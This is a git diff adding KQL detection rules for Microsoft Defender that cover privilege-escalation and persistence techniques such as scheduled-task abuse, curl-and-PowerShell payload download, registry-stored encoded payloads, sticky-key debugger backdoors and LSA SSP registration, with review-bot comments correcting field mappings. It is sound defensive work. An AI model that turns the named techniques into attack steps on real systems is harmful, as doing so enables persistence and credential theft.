+| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
new file mode 100644
index 00000000..18ddba49
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql 
@@ -0,0 +1,13 @@
+// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Benign scheduled tasks creations or executions that happen often during software installations
+// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR."
and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
new file mode 100644
index 00000000..74981cca
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Creation Masquerading as System Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005
+// False Positives:
+// - Legitimate system administration tasks scheduling trusted system processes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
new file mode 100644
index 00000000..8c557d30
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
@@ -0,0 +1,15 @@
+// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of schtasks for administrative purposes.
+// - Automation scripts combining curl and PowerShell in controlled environments.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
new file mode 100644
index 00000000..48a2d5d9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Executing Encoded Payload from Registry
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
new file mode 100644
index 00000000..9da4b61e
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
@@ -0,0 +1,10 @@
+// Title: Scheduled Task Executing Payload from Registry
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
new file mode 100644
index 00000000..15181baa
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
@@ -0,0 +1,14 @@
+// Title: Scheduled Task/Job At
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the use of at/atd which are utilities that are used to schedule tasks.
+They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/at" or FolderPath endswith "/atd"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
new file mode 100644
index 00000000..9b54a51a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
@@ -0,0 +1,10 @@
+// Title: Scheduled TaskCache Change by Uncommon Program
+// Author: Syed Hasan (@syedhasan009)
+// Date: 2021-06-18
+// Level: high
+// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or
RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
new file mode 100644
index 00000000..ae15f223
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
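Review bot: `RegistryValueData =~ "(Empty)"` in the first exclusion compares against the Sysmon placeholder for empty value details, which DeviceRegistryEvents does not emit as far as I can tell, so that branch never excludes anything; `isempty(RegistryValueData)` states the intent and also covers the separate `isnull(RegistryValueData)` term further along. The Session Manager Autorun Keys Modification hunk below carries the same `not(RegistryValueData =~ "(Empty)")` literal. Several exclusions use `InitiatingProcessFolderPath endswith` with a full drive path (`"C:\\Windows\\System32\\MoUsoCoreWorker.exe"`, `"C:\\Windows\\System32\\services.exe"`, the EdgeUpdate and OneDrive paths); these behave as exact matches, and `=~`, as used on the neighbouring `msiexec.exe` and `RuntimeBroker.exe` terms, would say so directly.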
@@ -0,0 +1,10 @@
+// Title: Schtasks Creation Or Modification With SYSTEM Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
new file mode 100644
index 00000000..3acf421e
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
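Review bot: The account test `ProcessCommandLine contains " SYSTEM "` requires a trailing space, so a command line whose last argument is `/ru SYSTEM` is not matched, and the quoted form `/ru "SYSTEM"` is missed as well. `ProcessCommandLine has "SYSTEM"` tokenises on word boundaries and handles both, and is already gated by the `/ru ` and `/create`/`/change` terms; if a tighter check is wanted, anchor it to the argument with a `matches regex` on `/ru` followed by the account name. The `contains "NT AUT"` alternative is unaffected.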
@@ -0,0 +1,10 @@
+// Title: Schtasks From Suspicious Folders
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-15
+// Level: high
+// Description: Detects scheduled task creations that have suspicious action command and folder combinations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql
new file mode 100644
index 00000000..807837c3
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql
@@ -0,0 +1,10 @@
+// Title: Security Privileges Enumeration Via Whoami.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-05
+// Level: high
+// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
new file mode 100644
index 00000000..e834eadf
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
@@ -0,0 +1,11 @@
+// Title: Security Support Provider (SSP) Added to LSA Configuration
+// Author: iwillkeepwatch
+// Date: 2019-01-18
+// Level: high
+// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
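Review bot: In the SSP hunk, `RegistryKey endswith "\\Control\\Lsa\\Security Packages"` (and the `OSConfig` variant) will not match in DeviceRegistryEvents: `Security Packages` is a value under the `Lsa` key, and MDE reports the value name in `RegistryValueName` while `RegistryKey` ends at `\\Control\\Lsa`. This reads like a Sigma `TargetObject` mapping, where key and value name are one string; a working form is `(RegistryKey endswith "\\Control\\Lsa" or RegistryKey endswith "\\Control\\Lsa\\OSConfig") and RegistryValueName =~ "Security Packages"`. The Session Manager Autorun Keys Modification hunk below has the same problem for `\\BootExecute`, `\\SetupExecute`, `\\S0InitialCommand` and `\\Execute`, which to my knowledge are values of `Session Manager` rather than subkeys, so those terms belong on `RegistryValueName` (`\\KnownDlls` and `\\AppCertDlls` are subkeys and are fine as written).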
diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
new file mode 100644
index 00000000..f436c7d2
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Session Manager Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql
new file mode 100644
index 00000000..b81cd9e0
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql
@@ -0,0 +1,15 @@
+// Title: Setup16.EXE Execution With Custom .Lst File
+// Author: frack113
+// Date: 2024-12-01
+// Level: medium
+// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
+These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
+Attackers and adversaries might leverage this as a living of the land utility.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005
+// False Positives:
+// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql
new file mode 100644
index 00000000..7560d036
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql
@@ -0,0 +1,12 @@
+// Title: Startup Folder File Write
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql
new file mode 100644
index 00000000..37ffef1f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql
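Review bot: The `where` clause has no ActionType predicate, so besides file creation it fires on modifications, renames and deletions under the StartUp folder (DeviceFileEvents carries all of these), which is broader than the title "File Write" and the description ("files being created") state. Adding `and ActionType in ("FileCreated", "FileModified", "FileRenamed")` after the path match keeps the documented intent; include `FileDeleted` only if clean-up of a dropped .lnk is also wanted, and then say so in the description.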
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Execution
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
new file mode 100644
index 00000000..f9739905
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
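Review bot: The description claims the rule detects "the usage and installation" of the backdoor, but this query only covers usage — winlogon.exe launching a shell or script host with an accessibility binary name on the command line; installation (the IFEO Debugger write) is the separate registry rule in this patch. I would narrow it to `// Description: Detects a shell or script host spawned by winlogon.exe with an accessibility tool (sethc, utilman, osk, Magnify, Narrator, DisplaySwitch) on its command line, i.e. an IFEO-debugger "sticky keys" backdoor being used from the logon screen.`. Note also that the binary-replacement variant (cmd.exe copied over sethc.exe) is not covered here, because FolderPath then ends in `\sethc.exe` rather than `\cmd.exe`; `ProcessVersionInfoOriginalFileName =~ "Cmd.Exe"` combined with FolderPath ending in one of the accessibility names would catch it, and the limitation is worth a comment if it is left out.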
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Usage - Registry
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql
new file mode 100644
index 00000000..88a2255e
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql
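Review bot: Every `RegistryKey endswith` pattern in the `where` clause ends in `\\Debugger`, which is the value name; DeviceRegistryEvents reports the value name separately in RegistryValueName and RegistryKey stops at `...\Image File Execution Options\sethc.exe`, so as written this critical-level rule should never match (the trailing value name is a Sysmon TargetObject convention that survived conversion — confirm with a test write on a lab host). Match the IFEO subkey on RegistryKey and the value on RegistryValueName instead, and restrict to value-set events so that clean-up deletions do not also fire at critical. The rewrite below keeps the same eight target binaries.

```kql
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
    and RegistryValueName =~ "Debugger"
    and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
    and (RegistryKey endswith "\\sethc.exe" or RegistryKey endswith "\\utilman.exe" or RegistryKey endswith "\\osk.exe" or RegistryKey endswith "\\Magnify.exe"
         or RegistryKey endswith "\\Narrator.exe" or RegistryKey endswith "\\DisplaySwitch.exe" or RegistryKey endswith "\\atbroker.exe" or RegistryKey endswith "\\HelpPane.exe")
```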
@@ -0,0 +1,13 @@
+// Title: Suspicious Autorun Registry Modified via WMI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-17
+// Level: high
+// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047
+// False Positives:
+// - Legitimate administrative activity or software installations
+
+DeviceProcessEvents
